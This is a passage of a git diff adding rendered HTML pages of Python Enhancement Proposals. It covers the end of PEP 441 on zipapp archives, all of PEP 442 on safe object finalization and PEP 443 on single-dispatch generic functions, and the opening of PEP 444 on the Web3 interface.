  • If the target is omitted (or None), the source must be a directory +and the target will be a file with the same name as the source, with +a .pyz extension added.
  • +
+

The interpreter argument specifies the name of the Python +interpreter with which the archive will be executed. It is written as +a “shebang” line at the start of the archive. On Unix, this will be +interpreted by the OS, and on Windows it will be handled by the Python +launcher. Omitting the interpreter results in no shebang line being +written. If an interpreter is specified, and the target is a +filename, the executable bit of the target file will be set.

+

The main argument specifies the name of a callable which will be +used as the main program for the archive. It can only be specified if +the source is a directory, and the source does not already contain a +__main__.py file. The main argument should take the form +“pkg.module:callable” and the archive will be run by importing +“pkg.module” and executing the given callable with no arguments. It +is an error to omit main if the source is a directory and does not +contain a __main__.py file, as otherwise the resulting archive +would not be executable.

+

If a file object is specified for source or target, it is the +caller’s responsibility to close it after calling create_archive.

+

When copying an existing archive, file objects supplied only need +read and readline, or write methods. When creating an +archive from a directory, if the target is a file object it will be +passed to the zipfile.ZipFile class, and must supply the methods +needed by that class.

+
+
+

get_interpreter(archive)

+

Returns the interpreter specified in the shebang line of the +archive. If there is no shebang, the function returns None. +The archive argument can be a filename or a file-like object open +for reading in bytes mode.

+
+
+
+

Command Line Usage

+

The zipapp module can be run with the python -m flag. The command +line interface is as follows:

+
python -m zipapp directory [options]
+
+    Create an archive from the given directory.  An archive will
+    be created from the contents of that directory.  The archive
+    will have the same name as the source directory with a .pyz
+    extension.
+
+    The following options can be specified:
+
+    -o archive / --output archive
+
+        The destination archive will have the specified name.  The
+        given name will be used as written, so should include the
+        ".pyz" or ".pyzw" extension.
+
+    -p interpreter / --python interpreter
+
+        The given interpreter will be written to the shebang line
+        of the archive.  If this option is not given, the archive
+        will have no shebang line.
+
+    -m pkg.mod:fn / --main pkg.mod:fn
+
+        The source directory must not have a __main__.py file. The
+        archiver will write a __main__.py file into the target
+        which calls fn from the module pkg.mod.
+
+
+

The behaviour of the command line interface matches that of +zipapp.create_archive().

+

In addition, it is possible to use the command line interface to work +with an existing archive:

+
python -m zipapp app.pyz --show
+
+    Displays the shebang line of an archive.  Output is of the
+    form
+
+        Interpreter: /usr/bin/env
+    or
+        Interpreter: <none>
+
+    and is intended for diagnostic use, not for scripts.
+
+python -m zipapp app.pyz -o newapp.pyz [-p interpreter]
+
+    Copy app.pyz to newapp.pyz, modifying the shebang line based
+    on the -p option (as for creating an archive, no -p option
+    means remove the shebang line).  Specifying a destination is
+    mandatory.
+
+    In-place modification of an archive is *not* supported, as the
+    risk of damaging archives is too great for a simple tool.
+
+
+

As noted, the archives are standard zip files, and so can be unpacked +using any standard ZIP utility or Python’s zipfile module. For this +reason, no interfaces to list the contents of an archive, or unpack +them, are provided or needed.

+
+
+

FAQ

+
+
Are you sure a standard ZIP utility can handle #! at the beginning?
Absolutely. The zipfile specification allows for arbitrary data to +be prepended to a zipfile. This feature is commonly used by +“self-extracting zip” programs. If your archive program can’t +handle this, it is a bug in your archive program.
+
Isn’t zipapp just a very thin wrapper over the zipfile module?
Yes. If you prefer to build your own Python zip application +archives using other tools, they will work just as well. The +zipapp module is a convenience, nothing more.
+
Why not use just use a .zip or .py extension?
Users expect a .zip file to be opened with an archive tool, and +expect a .py file to contain readable text. Both would be +confusing for this use case.
+
How does this compete with existing package formats?
The sdist, bdist and wheel formats are designed for packaging of +modules to be installed into an existing Python installation. +They are not intended to be used without installing. The +executable zip format is specifically designed for standalone use, +without needing to be installed. They are in effect a multi-file +version of a standalone Python script.
+
+
+
+
+

Rejected Proposals

+
+

Convenience Values for Shebang Lines

+

Is it worth having “convenience” forms for any of the common +interpreter values? For example, -p 3 meaning the same as -p +"/usr/bin/env python3". It would save a lot of typing for the +common cases, as well as giving cross-platform options for people who +don’t want or need to understand the intricacies of shebang handling +on “other” platforms.

+

Downsides are that it’s not obvious how to translate the +abbreviations. For example, should “3” mean “/usr/bin/env python3”, +“/usr/bin/python3”, “python3”, or something else? Also, there is no +obvious short form for the key case of “/usr/bin/env python” (any +available version of Python), which could easily result in scripts +being written with overly-restrictive shebang lines.

+

Overall, this seems like there are more problems than benefits, and as +a result has been dropped from consideration.

+
+
+

Registering .pyz as a Media Type

+

It was suggested [3] that the .pyz extension should be registered +in the Unix database of extensions. While it makes sense to do this +as an equivalent of the Windows installer registering the extension, +the .py extension is not listed in the media types database [4]. +It doesn’t seem reasonable to register .pyz without .py, so +this idea has been omitted from this PEP. An interested party could +arrange for both .py and .pyz to be registered at a future +date.

+
+
+

Default Interpreter

+

The initial draft of this PEP proposed using /usr/bin/env python +as the default interpreter. Unix users have problems with this +behaviour, as the default for the python command on many distributions +is Python 2, and it is felt that this PEP should prefer Python 3 by +default. However, using a command of python3 can result in +unexpected behaviour for Windows users, where the default behaviour of +the launcher for the command python is commonly customised by users, +but the behaviour of python3 may not be modified to match.

+

As a result, the principle “in the face of ambiguity, refuse to guess” +has been invoked, and archives have no shebang line unless explicitly +requested. On Windows, the archives will still be run (with the +default Python) by the launcher, and on Unix, the archives can be run +by explicitly invoking the desired Python interpreter.

+
+
+

Command Line Tool to Manage Shebang Lines

+

It is conceivable that users would want to modify the shebang line for +an existing archive, or even just display the current shebang line. +This is tricky to do so with existing tools (zip programs typically +ignore prepended data totally, and text editors can have trouble +editing files containing binary data).

+

The zipapp module provides functions to handle the shebang line, but +does not include a command line interface to that functionality. This +is because it is not clear how to provide one without the resulting +interface being over-complex and potentially confusing. Changing the +shebang line is expected to be an uncommon requirement.

+
+
+
+

Reference Implementation

+

A reference implementation is at http://bugs.python.org/issue23491.

+
+
+

References

+ +

The discussion of this PEP took place on the python-dev mailing list, +in the thread starting at +https://mail.python.org/pipermail/python-dev/2015-February/138277.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0441.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0442/index.html b/pep-0442/index.html new file mode 100644 index 00000000000..32f2b67d4d6 --- /dev/null +++ b/pep-0442/index.html @@ -0,0 +1,391 @@ + + + + + + + + PEP 442 – Safe object finalization | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 442 – Safe object finalization

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
BDFL-Delegate:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-May-2013
+
Python-Version:
+
3.4
+
Post-History:
+
18-May-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to deal with the current limitations of object +finalization. The goal is to be able to define and run finalizers +for any object, regardless of their position in the object graph.

+

This PEP doesn’t call for any change in Python code. Objects +with existing finalizers will benefit automatically.

+
+
+

Definitions

+
+
Reference
A directional link from an object to another. The target of the +reference is kept alive by the reference, as long as the source is +itself alive and the reference isn’t cleared.
+
Weak reference
A directional link from an object to another, which doesn’t keep +alive its target. This PEP focuses on non-weak references.
+
Reference cycle
A cyclic subgraph of directional links between objects, which keeps +those objects from being collected in a pure reference-counting +scheme.
+
Cyclic isolate (CI)
A standalone subgraph of objects in which no object is referenced +from the outside, containing one or several reference cycles, and +whose objects are still in a usable, non-broken state: they can +access each other from their respective finalizers.
+
Cyclic garbage collector (GC)
A device able to detect cyclic isolates and turn them into cyclic +trash. Objects in cyclic trash are eventually disposed of by +the natural effect of the references being cleared and their +reference counts dropping to zero.
+
Cyclic trash (CT)
A former cyclic isolate whose objects have started being cleared +by the GC. Objects in cyclic trash are potential zombies; if they +are accessed by Python code, the symptoms can vary from weird +AttributeErrors to crashes.
+
Zombie / broken object
An object part of cyclic trash. The term stresses that the object +is not safe: its outgoing references may have been cleared, or one +of the objects it references may be zombie. Therefore, +it should not be accessed by arbitrary code (such as finalizers).
+
Finalizer
A function or method called when an object is intended to be +disposed of. The finalizer can access the object and release any +resource held by the object (for example mutexes or file +descriptors). An example is a __del__ method.
+
Resurrection
The process by which a finalizer creates a new reference to an +object in a CI. This can happen as a quirky but supported +side-effect of __del__ methods.
+
+
+
+

Impact

+

While this PEP discusses CPython-specific implementation details, the +change in finalization semantics is expected to affect the Python +ecosystem as a whole. In particular, this PEP obsoletes the current +guideline that “objects with a __del__ method should not be part of a +reference cycle”.

+
+
+

Benefits

+

The primary benefits of this PEP regard objects with finalizers, such +as objects with a __del__ method and generators with a finally +block. Those objects can now be reclaimed when they are part of a +reference cycle.

+

The PEP also paves the way for further benefits:

+
    +
  • The module shutdown procedure may not need to set global variables to +None anymore. This could solve a well-known class of irritating issues.
  • +
+

The PEP doesn’t change the semantics of:

+
    +
  • Weak references caught in reference cycles.
  • +
  • C extension types with a custom tp_dealloc function.
  • +
+
+
+

Description

+
+

Reference-counted disposal

+

In normal reference-counted disposal, an object’s finalizer is called +just before the object is deallocated. If the finalizer resurrects +the object, deallocation is aborted.

+

However, if the object was already finalized, then the finalizer isn’t +called. This prevents us from finalizing zombies (see below).

+
+
+

Disposal of cyclic isolates

+

Cyclic isolates are first detected by the garbage collector, and then +disposed of. The detection phase doesn’t change and won’t be described +here. Disposal of a CI traditionally works in the following order:

+
    +
  1. Weakrefs to CI objects are cleared, and their callbacks called. At +this point, the objects are still safe to use.
  2. +
  3. The CI becomes a CT as the GC systematically breaks all +known references inside it (using the tp_clear function).
  4. +
  5. Nothing. All CT objects should have been disposed of in step 2 +(as a side-effect of clearing references); this collection is +finished.
  6. +
+

This PEP proposes to turn CI disposal into the following sequence (new +steps are in bold):

+
    +
  1. Weakrefs to CI objects are cleared, and their callbacks called. At +this point, the objects are still safe to use.
  2. +
  3. The finalizers of all CI objects are called.
  4. +
  5. The CI is traversed again to determine if it is still isolated. +If it is determined that at least one object in CI is now reachable +from outside the CI, this collection is aborted and the whole CI +is resurrected. Otherwise, proceed.
  6. +
  7. The CI becomes a CT as the GC systematically breaks all +known references inside it (using the tp_clear function).
  8. +
  9. Nothing. All CT objects should have been disposed of in step 4 +(as a side-effect of clearing references); this collection is +finished.
  10. +
+
+

Note

+

The GC doesn’t recalculate the CI after step 2 above, hence the need +for step 3 to check that the whole subgraph is still isolated.

+
+
+
+
+

C-level changes

+

Type objects get a new tp_finalize slot to which __del__ methods +are mapped (and reciprocally). Generators are modified to use this slot, +rather than tp_del. A tp_finalize function is a normal C +function which will be called with a valid and alive PyObject as its +only argument. It doesn’t need to manipulate the object’s reference count, +as this will be done by the caller. However, it must ensure that the +original exception state is restored before returning to the caller.

+

For compatibility, tp_del is kept in the type structure. Handling +of objects with a non-NULL tp_del is unchanged: when part of a CI, +they are not finalized and end up in gc.garbage. However, a non-NULL +tp_del is not encountered anymore in the CPython source tree (except +for testing purposes).

+

Two new C API functions are provided to ease calling of tp_finalize, +especially from custom deallocators.

+

On the internal side, a bit is reserved in the GC header for GC-managed +objects to signal that they were finalized. This helps avoid finalizing +an object twice (and, especially, finalizing a CT object after it was +broken by the GC).

+
+

Note

+

Objects which are not GC-enabled can also have a tp_finalize slot. +They don’t need the additional bit since their tp_finalize function +can only be called from the deallocator: it therefore cannot be called +twice, except when resurrected.

+
+
+
+

Discussion

+
+

Predictability

+

Following this scheme, an object’s finalizer is always called exactly +once, even if it was resurrected afterwards.

+

For CI objects, the order in which finalizers are called (step 2 above) +is undefined.

+
+
+

Safety

+

It is important to explain why the proposed change is safe. There +are two aspects to be discussed:

+
    +
  • Can a finalizer access zombie objects (including the object being +finalized)?
  • +
  • What happens if a finalizer mutates the object graph so as to impact +the CI?
  • +
+

Let’s discuss the first issue. We will divide possible cases in two +categories:

+
    +
  • If the object being finalized is part of the CI: by construction, no +objects in CI are zombies yet, since CI finalizers are called before +any reference breaking is done. Therefore, the finalizer cannot +access zombie objects, which don’t exist.
  • +
  • If the object being finalized is not part of the CI/CT: by definition, +objects in the CI/CT don’t have any references pointing to them from +outside the CI/CT. Therefore, the finalizer cannot reach any zombie +object (that is, even if the object being finalized was itself +referenced from a zombie object).
  • +
+

Now for the second issue. There are three potential cases:

+
    +
  • The finalizer clears an existing reference to a CI object. The CI +object may be disposed of before the GC tries to break it, which +is fine (the GC simply has to be aware of this possibility).
  • +
  • The finalizer creates a new reference to a CI object. This can only +happen from a CI object’s finalizer (see above why). Therefore, the +new reference will be detected by the GC after all CI finalizers are +called (step 3 above), and collection will be aborted without any +objects being broken.
  • +
  • The finalizer clears or creates a reference to a non-CI object. By +construction, this is not a problem.
  • +
+
+
+
+

Implementation

+

An implementation is available in branch finalize of the repository +at http://hg.python.org/features/finalize/.

+
+
+

Validation

+

Besides running the normal Python test suite, the implementation adds +test cases for various finalization possibilities including reference cycles, +object resurrection and legacy tp_del slots.

+

The implementation has also been checked to not produce any regressions on +the following test suites:

+ +
+
+

References

+

Notes about reference cycle collection and weak reference callbacks: +http://hg.python.org/cpython/file/4e687d53b645/Modules/gc_weakref.txt

+

Generator memory leak: http://bugs.python.org/issue17468

+

Allow objects to decide if they can be collected by GC: +http://bugs.python.org/issue9141

+

Module shutdown procedure based on GC +http://bugs.python.org/issue812369

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0442.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0443/index.html b/pep-0443/index.html new file mode 100644 index 00000000000..6a95880d201 --- /dev/null +++ b/pep-0443/index.html @@ -0,0 +1,519 @@ + + + + + + + + PEP 443 – Single-dispatch generic functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 443 – Single-dispatch generic functions

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-May-2013
+
Python-Version:
+
3.4
+
Post-History:
+
22-May-2013, 25-May-2013, 31-May-2013
+
Replaces:
+
245, 246, 3124
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new mechanism in the functools standard library +module that provides a simple form of generic programming known as +single-dispatch generic functions.

+

A generic function is composed of multiple functions implementing +the same operation for different types. Which implementation should be +used during a call is determined by the dispatch algorithm. When the +implementation is chosen based on the type of a single argument, this is +known as single dispatch.

+
+
+

Rationale and Goals

+

Python has always provided a variety of built-in and standard-library +generic functions, such as len(), iter(), pprint.pprint(), +copy.copy(), and most of the functions in the operator module. +However, it currently:

+
    +
  1. does not have a simple or straightforward way for developers to +create new generic functions,
  2. +
  3. does not have a standard way for methods to be added to existing +generic functions (i.e., some are added using registration +functions, others require defining __special__ methods, possibly +by monkeypatching).
  4. +
+

In addition, it is currently a common anti-pattern for Python code to +inspect the types of received arguments, in order to decide what to do +with the objects.

+

For example, code may wish to accept either an object +of some type, or a sequence of objects of that type. +Currently, the “obvious way” to do this is by type inspection, but this +is brittle and closed to extension.

+

Abstract Base Classes make it easier +to discover present behaviour, but don’t help adding new behaviour. +A developer using an already-written library may be unable to change how +their objects are treated by such code, especially if the objects they +are using were created by a third party.

+

Therefore, this PEP proposes a uniform API to address dynamic +overloading using decorators.

+
+
+

User API

+

To define a generic function, decorate it with the @singledispatch +decorator. Note that the dispatch happens on the type of the first +argument. Create your function accordingly:

+
>>> from functools import singledispatch
+>>> @singledispatch
+... def fun(arg, verbose=False):
+...     if verbose:
+...         print("Let me just say,", end=" ")
+...     print(arg)
+
+
+

To add overloaded implementations to the function, use the +register() attribute of the generic function. This is a decorator, +taking a type parameter and decorating a function implementing the +operation for that type:

+
>>> @fun.register(int)
+... def _(arg, verbose=False):
+...     if verbose:
+...         print("Strength in numbers, eh?", end=" ")
+...     print(arg)
+...
+>>> @fun.register(list)
+... def _(arg, verbose=False):
+...     if verbose:
+...         print("Enumerate this:")
+...     for i, elem in enumerate(arg):
+...         print(i, elem)
+
+
+

To enable registering lambdas and pre-existing functions, the +register() attribute can be used in a functional form:

+
>>> def nothing(arg, verbose=False):
+...     print("Nothing.")
+...
+>>> fun.register(type(None), nothing)
+
+
+

The register() attribute returns the undecorated function. This +enables decorator stacking, pickling, as well as creating unit tests for +each variant independently:

+
>>> @fun.register(float)
+... @fun.register(Decimal)
+... def fun_num(arg, verbose=False):
+...     if verbose:
+...         print("Half of your number:", end=" ")
+...     print(arg / 2)
+...
+>>> fun_num is fun
+False
+
+
+

When called, the generic function dispatches on the type of the first +argument:

+
>>> fun("Hello, world.")
+Hello, world.
+>>> fun("test.", verbose=True)
+Let me just say, test.
+>>> fun(42, verbose=True)
+Strength in numbers, eh? 42
+>>> fun(['spam', 'spam', 'eggs', 'spam'], verbose=True)
+Enumerate this:
+0 spam
+1 spam
+2 eggs
+3 spam
+>>> fun(None)
+Nothing.
+>>> fun(1.23)
+0.615
+
+
+

Where there is no registered implementation for a specific type, its +method resolution order is used to find a more generic implementation. +The original function decorated with @singledispatch is registered +for the base object type, which means it is used if no better +implementation is found.

+

To check which implementation will the generic function choose for +a given type, use the dispatch() attribute:

+
>>> fun.dispatch(float)
+<function fun_num at 0x104319058>
+>>> fun.dispatch(dict)    # note: default implementation
+<function fun at 0x103fe0000>
+
+
+

To access all registered implementations, use the read-only registry +attribute:

+
>>> fun.registry.keys()
+dict_keys([<class 'NoneType'>, <class 'int'>, <class 'object'>,
+          <class 'decimal.Decimal'>, <class 'list'>,
+          <class 'float'>])
+>>> fun.registry[float]
+<function fun_num at 0x1035a2840>
+>>> fun.registry[object]
+<function fun at 0x103fe0000>
+
+
+

The proposed API is intentionally limited and opinionated, as to ensure +it is easy to explain and use, as well as to maintain consistency with +existing members in the functools module.

+
+
+

Implementation Notes

+

The functionality described in this PEP is already implemented in the +pkgutil standard library module as simplegeneric. Because this +implementation is mature, the goal is to move it largely as-is. The +reference implementation is available on hg.python.org [1].

+

The dispatch type is specified as a decorator argument. An alternative +form using function annotations was considered but its inclusion +has been rejected. As of May 2013, this usage pattern is out of scope +for the standard library [2], and the best practices for +annotation usage are still debated.

+

Based on the current pkgutil.simplegeneric implementation, and +following the convention on registering virtual subclasses on Abstract +Base Classes, the dispatch registry will not be thread-safe.

+
+

Abstract Base Classes

+

The pkgutil.simplegeneric implementation relied on several forms of +method resolution order (MRO). @singledispatch removes special +handling of old-style classes and Zope’s ExtensionClasses. More +importantly, it introduces support for Abstract Base Classes (ABC).

+

When a generic function implementation is registered for an ABC, the +dispatch algorithm switches to an extended form of C3 linearization, +which includes the relevant ABCs in the MRO of the provided argument. +The algorithm inserts ABCs where their functionality is introduced, i.e. +issubclass(cls, abc) returns True for the class itself but +returns False for all its direct base classes. Implicit ABCs for +a given class (either registered or inferred from the presence of +a special method like __len__()) are inserted directly after the +last ABC explicitly listed in the MRO of said class.

+

In its most basic form, this linearization returns the MRO for the given +type:

+
>>> _compose_mro(dict, [])
+[<class 'dict'>, <class 'object'>]
+
+
+

When the second argument contains ABCs that the specified type is +a subclass of, they are inserted in a predictable order:

+
>>> _compose_mro(dict, [Sized, MutableMapping, str,
+...                     Sequence, Iterable])
+[<class 'dict'>, <class 'collections.abc.MutableMapping'>,
+ <class 'collections.abc.Mapping'>, <class 'collections.abc.Sized'>,
+ <class 'collections.abc.Iterable'>, <class 'collections.abc.Container'>,
+ <class 'object'>]
+
+
+

While this mode of operation is significantly slower, all dispatch +decisions are cached. The cache is invalidated on registering new +implementations on the generic function or when user code calls +register() on an ABC to implicitly subclass it. In the latter case, +it is possible to create a situation with ambiguous dispatch, for +instance:

+
>>> from collections.abc import Iterable, Container
+>>> class P:
+...     pass
+>>> Iterable.register(P)
+<class '__main__.P'>
+>>> Container.register(P)
+<class '__main__.P'>
+
+
+

Faced with ambiguity, @singledispatch refuses the temptation to +guess:

+
>>> @singledispatch
+... def g(arg):
+...     return "base"
+...
+>>> g.register(Iterable, lambda arg: "iterable")
+<function <lambda> at 0x108b49110>
+>>> g.register(Container, lambda arg: "container")
+<function <lambda> at 0x108b491c8>
+>>> g(P())
+Traceback (most recent call last):
+...
+RuntimeError: Ambiguous dispatch: <class 'collections.abc.Container'>
+or <class 'collections.abc.Iterable'>
+
+
+

Note that this exception would not be raised if one or more ABCs had +been provided explicitly as base classes during class definition. In +this case dispatch happens in the MRO order:

+
>>> class Ten(Iterable, Container):
+...     def __iter__(self):
+...         for i in range(10):
+...             yield i
+...     def __contains__(self, value):
+...         return value in range(10)
+...
+>>> g(Ten())
+'iterable'
+
+
+

A similar conflict arises when subclassing an ABC is inferred from the +presence of a special method like __len__() or __contains__():

+
>>> class Q:
+...   def __contains__(self, value):
+...     return False
+...
+>>> issubclass(Q, Container)
+True
+>>> Iterable.register(Q)
+>>> g(Q())
+Traceback (most recent call last):
+...
+RuntimeError: Ambiguous dispatch: <class 'collections.abc.Container'>
+or <class 'collections.abc.Iterable'>
+
+
+

An early version of the PEP contained a custom approach that was simpler +but created a number of edge cases with surprising results [3].

+
+
+
+

Usage Patterns

+

This PEP proposes extending behaviour only of functions specifically +marked as generic. Just as a base class method may be overridden by +a subclass, so too a function may be overloaded to provide custom +functionality for a given type.

+

Universal overloading does not equal arbitrary overloading, in the +sense that we need not expect people to randomly redefine the behavior +of existing functions in unpredictable ways. To the contrary, generic +function usage in actual programs tends to follow very predictable +patterns and registered implementations are highly-discoverable in the +common case.

+

If a module is defining a new generic operation, it will usually also +define any required implementations for existing types in the same +place. Likewise, if a module is defining a new type, then it will +usually define implementations there for any generic functions that it +knows or cares about. As a result, the vast majority of registered +implementations can be found adjacent to either the function being +overloaded, or to a newly-defined type for which the implementation is +adding support.

+

It is only in rather infrequent cases that one will have implementations +registered in a module that contains neither the function nor the +type(s) for which the implementation is added. In the absence of +incompetence or deliberate intention to be obscure, the few +implementations that are not registered adjacent to the relevant type(s) +or function(s), will generally not need to be understood or known about +outside the scope where those implementations are defined. (Except in +the “support modules” case, where best practice suggests naming them +accordingly.)

+

As mentioned earlier, single-dispatch generics are already prolific +throughout the standard library. A clean, standard way of doing them +provides a way forward to refactor those custom implementations to use +a common one, opening them up for user extensibility at the same time.

+
+
+

Alternative approaches

+

In PEP 3124 Phillip J. Eby proposes a full-grown solution +with overloading based on arbitrary rule sets (with the default +implementation dispatching on argument types), as well as interfaces, +adaptation and method combining. PEAK-Rules [4] is +a reference implementation of the concepts described in PJE’s PEP.

+

Such a broad approach is inherently complex, which makes reaching +a consensus hard. In contrast, this PEP focuses on a single piece of +functionality that is simple to reason about. It’s important to note +this does not preclude the use of other approaches now or in the future.

+

In a 2005 article on Artima [5] Guido van Rossum presents +a generic function implementation that dispatches on types of all +arguments on a function. The same approach was chosen in Andrey Popp’s +generic package available on PyPI [6], as well as David +Mertz’s gnosis.magic.multimethods [7].

+

While this seems desirable at first, I agree with Fredrik Lundh’s +comment that “if you design APIs with pages of logic just to sort out +what code a function should execute, you should probably hand over the +API design to someone else”. In other words, the single argument +approach proposed in this PEP is not only easier to implement but also +clearly communicates that dispatching on a more complex state is an +anti-pattern. It also has the virtue of corresponding directly with the +familiar method dispatch mechanism in object oriented programming. The +only difference is whether the custom implementation is associated more +closely with the data (object-oriented methods) or the algorithm +(single-dispatch overloading).

+

PyPy’s RPython offers extendabletype [8], a metaclass which +enables classes to be externally extended. In combination with +pairtype() and pair() factories, this offers a form of +single-dispatch generics.

+
+
+

Acknowledgements

+

Apart from Phillip J. Eby’s work on PEP 3124 and +PEAK-Rules, influences include Paul Moore’s original issue +[9] that proposed exposing pkgutil.simplegeneric as part +of the functools API, Guido van Rossum’s article on multimethods +[5], and discussions with Raymond Hettinger on a general +pprint rewrite. Huge thanks to Alyssa Coghlan for encouraging me to create +this PEP and providing initial feedback.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0443.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0444/index.html b/pep-0444/index.html new file mode 100644 index 00000000000..34a86184f28 --- /dev/null +++ b/pep-0444/index.html @@ -0,0 +1,1621 @@ + + + + + + + + PEP 444 – Python Web3 Interface | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 444 – Python Web3 Interface

+
+
Author:
+
Chris McDonough <chrism at plope.com>, +Armin Ronacher <armin.ronacher at active-4.com>
+
Discussions-To:
+
Web-SIG list
+
Status:
+
Deferred
+
Type:
+
Informational
+
Created:
+
19-Jul-2010
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document specifies a proposed second-generation standard +interface between web servers and Python web applications or +frameworks.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+

Note that since this PEP was first created, PEP 3333 was created as a more +incremental update that permitted use of WSGI on Python 3.2+. However, an +alternative specification that furthers the Python 3 goals of a cleaner +separation of binary and text data may still be valuable.

+
+
+

Rationale and Goals

+

This protocol and specification is influenced heavily by the Web +Services Gateway Interface (WSGI) 1.0 standard described in PEP 333. +The high-level rationale for having any standard that allows +Python-based web servers and applications to interoperate is outlined +in PEP 333. This document essentially uses PEP 333 as a template, and +changes its wording in various places for the purpose of forming a +different standard.

+

Python currently boasts a wide variety of web application frameworks +which use the WSGI 1.0 protocol. However, due to changes in the +language, the WSGI 1.0 protocol is not compatible with Python 3. This +specification describes a standardized WSGI-like protocol that lets +Python 2.6, 2.7 and 3.1+ applications communicate with web servers. +Web3 is clearly a WSGI derivative; it only uses a different name than +“WSGI” in order to indicate that it is not in any way backwards +compatible.

+

Applications and servers which are written to this specification are +meant to work properly under Python 2.6.X, Python 2.7.X and Python +3.1+. Neither an application nor a server that implements the Web3 +specification can be easily written which will work under Python 2 +versions earlier than 2.6 nor Python 3 versions earlier than 3.1.

+
+

Note

+

Whatever Python 3 version fixed http://bugs.python.org/issue4006 so +os.environ['foo'] returns surrogates (ala PEP 383) when the +value of ‘foo’ cannot be decoded using the current locale instead +of failing with a KeyError is the true minimum Python 3 version. +In particular, however, Python 3.0 is not supported.

+
+
+

Note

+

Python 2.6 is the first Python version that supported an alias for +bytes and the b"foo" literal syntax. This is why it is the +minimum version supported by Web3.

+
+

Explicability and documentability are the main technical drivers for +the decisions made within the standard.

+
+
+

Differences from WSGI

+
    +
  • All protocol-specific environment names are prefixed with web3. +rather than wsgi., eg. web3.input rather than +wsgi.input.
  • +
  • All values present as environment dictionary values are explicitly +bytes instances instead of native strings. (Environment keys +however are native strings, always str regardless of +platform).
  • +
  • All values returned by an application must be bytes instances, +including status code, header names and values, and the body.
  • +
  • Wherever WSGI 1.0 referred to an app_iter, this specification +refers to a body.
  • +
  • No start_response() callback (and therefore no write() +callable nor exc_info data).
  • +
  • The readline() function of web3.input must support a size +hint parameter.
  • +
  • The read() function of web3.input must be length delimited. +A call without a size argument must not read more than the content +length header specifies. In case a content length header is absent +the stream must not return anything on read. It must never request +more data than specified from the client.
  • +
  • No requirement for middleware to yield an empty string if it needs +more information from an application to produce output (e.g. no +“Middleware Handling of Block Boundaries”).
  • +
  • Filelike objects passed to a “file_wrapper” must have an +__iter__ which returns bytes (never text).
  • +
  • wsgi.file_wrapper is not supported.
  • +
  • QUERY_STRING, SCRIPT_NAME, PATH_INFO values required to +be placed in environ by server (each as the empty bytes instance if +no associated value is received in the HTTP request).
  • +
  • web3.path_info and web3.script_name should be put into the +Web3 environment, if possible, by the origin Web3 server. When +available, each is the original, plain 7-bit ASCII, URL-encoded +variant of its CGI equivalent derived directly from the request URI +(with %2F segment markers and other meta-characters intact). If the +server cannot provide one (or both) of these values, it must omit +the value(s) it cannot provide from the environment.
  • +
  • This requirement was removed: “middleware components must not +block iteration waiting for multiple values from an application +iterable. If the middleware needs to accumulate more data from the +application before it can produce any output, it must yield an +empty string.”
  • +
  • SERVER_PORT must be a bytes instance (not an integer).
  • +
  • The server must not inject an additional Content-Length header +by guessing the length from the response iterable. This must be set +by the application itself in all situations.
  • +
  • If the origin server advertises that it has the web3.async +capability, a Web3 application callable used by the server is +permitted to return a callable that accepts no arguments. When it +does so, this callable is to be called periodically by the origin +server until it returns a non-None response, which must be a +normal Web3 response tuple.
  • +
+
+
+

Specification Overview

+

The Web3 interface has two sides: the “server” or “gateway” side, and +the “application” or “framework” side. The server side invokes a +callable object that is provided by the application side. The +specifics of how that object is provided are up to the server or +gateway. It is assumed that some servers or gateways will require an +application’s deployer to write a short script to create an instance +of the server or gateway, and supply it with the application object. +Other servers and gateways may use configuration files or other +mechanisms to specify where an application object should be imported +from, or otherwise obtained.

+

In addition to “pure” servers/gateways and applications/frameworks, it +is also possible to create “middleware” components that implement both +sides of this specification. Such components act as an application to +their containing server, and as a server to a contained application, +and can be used to provide extended APIs, content transformation, +navigation, and other useful functions.

+

Throughout this specification, we will use the term “application +callable” to mean “a function, a method, or an instance with a +__call__ method”. It is up to the server, gateway, or application +implementing the application callable to choose the appropriate +implementation technique for their needs. Conversely, a server, +gateway, or application that is invoking a callable must not have +any dependency on what kind of callable was provided to it. +Application callables are only to be called, not introspected upon.

+
+

The Application/Framework Side

+

The application object is simply a callable object that accepts one +argument. The term “object” should not be misconstrued as requiring +an actual object instance: a function, method, or instance with a +__call__ method are all acceptable for use as an application +object. Application objects must be able to be invoked more than +once, as virtually all servers/gateways (other than CGI) will make +such repeated requests. If this cannot be guaranteed by the +implementation of the actual application, it has to be wrapped in a +function that creates a new instance on each call.

+
+

Note

+

